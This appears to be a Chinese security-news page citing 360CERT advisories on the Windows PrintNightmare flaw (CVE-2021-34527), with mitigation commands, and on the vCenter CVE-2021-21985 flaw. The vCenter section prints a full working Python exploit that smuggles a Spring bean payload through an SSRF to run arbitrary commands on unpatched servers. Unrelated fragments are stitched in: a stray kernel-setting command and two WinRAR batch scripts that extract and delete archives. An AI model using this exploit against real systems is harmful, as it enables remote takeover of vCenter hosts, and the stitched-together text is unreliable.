业界快讯 第6页

报告编号：B6-2021-071601

报告来源：360CERT

报告作者：360CERT

更新日期：2021-07-16

echo 0 > /proc/sys/user/max_user_namespaces

2021年7月1日，微软提前发布Windows Print Spooler 远程代码执行漏洞（CVE-2021-34527）。此漏洞与分配为 CVE-2021-1675 的漏洞相似但不同，后者解决了 RpcAddPrinterDriverEx() 中的不同漏洞。攻击向量也不同。CVE-2021-1675 已由 2021 年 6 月的安全更新解决。

漏洞概述：

Microsoft 已发现并调查影响 Windows Print Spooler 的远程代码执行漏洞，并已将 CVE-2021-34527 分配给此漏洞。

当 Windows Print Spooler 服务不正确地执行特权文件操作时，存在远程执行代码漏洞风险。成功利用此漏洞的攻击者可以使用 SYSTEM 权限运行任意代码。然后攻击者可以安装程序；查看、更改或删除数据；或创建具有完全用户权限的新帐户。

攻击必须涉及调用 RpcAddPrinterDriverEx() 的经过身份验证的用户。

漏洞等级：严重

漏洞编号：CVE-2021-34527

受影响的版本：

包含该漏洞的代码存在于所有版本的 Windows 中，微软仍在调查是否所有版本都可以利用。

漏洞利用情况：

目前微软公告显示，该漏洞已公开披露，疑似已检测到在野利用，漏洞POC（概念验证代码）已公开。

漏洞解决办法：

微软公司给出了针对该漏洞的缓解办法，目前正式补丁尚未发布。

确定 Print Spooler 服务是否正在运行（以域管理员身份运行）

以域管理员身份运行以下命令：

Get-Service -Name Spooler

如果 Print Spooler 正在运行或该服务未设置为禁用，请选择以下选项之一以禁用 Print Spooler 服务，或通过组策略禁用入站远程打印：

选项 1 – 禁用 Print Spooler 服务

如果禁用 Print Spooler 服务适合您的企业，请使用以下 PowerShell 命令：

Stop-Service -Name Spooler -Force

Set-Service -Name Spooler -StartupType Disabled

禁用 Print Spooler 服务会禁用本地和远程打印功能。

选项 2 – 通过组策略禁用入站远程打印

运行组策略编辑器(Win+R，输入gpedit.msc，打开组策略编辑器），依次浏览到：计算机配置/管理模板/打印机

禁用“允许打印后台处理程序接受客户端连接：”策略以阻止远程攻击。

变通办法的影响：

此策略将通过阻止入站远程打印操作来阻止远程攻击。该系统将不再用作打印服务器，但仍然可以本地打印到直接连接的设备。

参考链接：

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

VMware于2021年5月25日发布安全公告VMSA-2021-0010，其中包含了与vSphere Client (HTML5)相关的漏洞，分别为CVE-2021-21985和CVE-2021-21986。

详细信息请参考：https://www.vmware.com/security/advisories/VMSA-2021-0010.html

CVE描述：

由于Virtual SAN运行状况检查插件中缺少输入验证，因此vSphere Client（HTML5）包含一个远程执行代码漏洞，默认情况下，该插件已在vCenter Server中启用。

VMware已评估此问题的严重性在严重严重性范围内，最大CVSSv3基本得分为9.8。

已知攻击：

具有网络访问端口443的恶意行为者可能会利用此问题在托管vCenter Server的基础操作系统上以不受限制的特权执行命令。

即使组织没有在外部公开vCenter Server，一旦进入网络，攻击者仍然可以利用此漏洞。在通过其他方式（例如，鱼叉式网络钓鱼）获得对网络的访问权限之后，VMware特别呼吁勒索软件团体非常善于利用此类漏洞（例如，这种后危害）。

影响范围：

无论是否使用vSAN，默认情况下，所有vCenter Server部署中都会启用受影响的Virtual SAN运行状况检查插件。

vCenter 7.0 U2b (17958471)之前的所有版本;

vCenter 6.7 U3n(18010531)之前的所有版本；

vCenter 6.5U3p(17994927)之前的所有版本；

EXP：

https://github.com/r0ckysec/CVE-2021-21985

https://github.com/xnianq/cve-2021-21985_exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/6/3-16:57
"""
import base64
import sys
import zipfile
from urllib.parse import urlparse

import zlib
import json
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def banner():
    print("""
==============================================================
         _____           _              _____   _____ ______ 
        / ____|         | |            |  __ \ / ____|  ____|
 __   _| |     ___ _ __ | |_ ___ _ __  | |__) | |    | |__   
 \ \ / / |    / _ \ '_ \| __/ _ \ '__| |  _  /| |    |  __|  
  \ V /| |___|  __/ | | | ||  __/ |    | | \ \| |____| |____ 
   \_/  \_____\___|_| |_|\__\___|_|    |_|  \_\\_____|______|
                                                             
                              Powered by r0cky Team ZionLab
==============================================================
    """)



def create_xml():

    print("[*] Create Xml to offline_bundle.xml ...")
    context = """<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
          <list>
            <value>/bin/bash</value>
            <value>-c</value>
            <value><![CDATA[ {cmd} 2>&1 ]]></value>
          </list>
        </constructor-arg>
    </bean>
    <bean id="is" class="java.io.InputStreamReader">
        <constructor-arg>
            <value>#{pb.start().getInputStream()}</value>
        </constructor-arg>
    </bean>
    <bean id="br" class="java.io.BufferedReader">
        <constructor-arg>
            <value>#{is}</value>
        </constructor-arg>
    </bean>
    <bean id="collectors" class="java.util.stream.Collectors"></bean>
    <bean id="system" class="java.lang.System">
        <property name="whatever" value="#{ system.setProperty(&quot;output&quot;, br.lines().collect(collectors.joining(&quot;\n&quot;))) }"/>
    </bean>
</beans>
""".replace("{cmd}", cmd)
    with open('offline_bundle.xml', 'w') as wf:
        wf.write(context)
        wf.flush()

def create_zip():
    print("[*] Create Zip to offline_bundle.zip ...")
    with zipfile.ZipFile('offline_bundle.zip', 'w', zipfile.ZIP_DEFLATED) as zp:
        zp.write('offline_bundle.xml')

def toBase64():
    with open('offline_bundle.zip', 'rb') as rf:
        return base64.b64encode(rf.read())

def poc1(url):
    ssrf_str = "https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,{}%23"
    ssrf = ssrf_str.format(bytes.decode(toBase64()))

    print ("[*] Get XML to SystemProperties  ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages"

    data = {"methodInput":[[ssrf]]}

    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)


def poc2(url):

    print("[*] getProperty   ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty"

    data = {"methodInput": ["output", None]}

    r = requests.post(target, data=json.dumps(data), headers=headers,
                      verify=False)
    if "result" in r.json():
        print("[+] Command:", cmd)
        print(r.json()['result'])
    else:
        print ("[-] send payload failed.")

headers = {"Content-Type": "application/json"}

def main(url):
    try:
        create_xml()
        create_zip()
        poc1(url)
        poc2(url)
    except:
        print("[-] send payload failed.")

if __name__ == '__main__':
    banner()
    try:
        target = sys.argv[1]
        cmd = sys.argv[2]
        up = urlparse(target)
        target = up.scheme + "://" + up.netloc
        main(target)
    except:
        print("Example: \n\tpython3 " + sys.argv[0] + " <target> <cmd>\n")

@echo off
set WinRAR="C:\Program Files\WinRAR\WinRAR.exe"
for /r . %%a in (*.rar *.zip) do (
cd "%%~pa"
%WinRAR% x "%%a"
del "%%a"
)

@echo off
set WinRAR="C:\Program Files\WinRAR\WinRAR.exe"
for /r . %%a in (*.rar *.zip) do (
cd "%%~pa"
%WinRAR% x -ad -y "%%a"
del "%%a"
)

转载【https://blog.csdn.net/hahohehehe/article/details/103393802】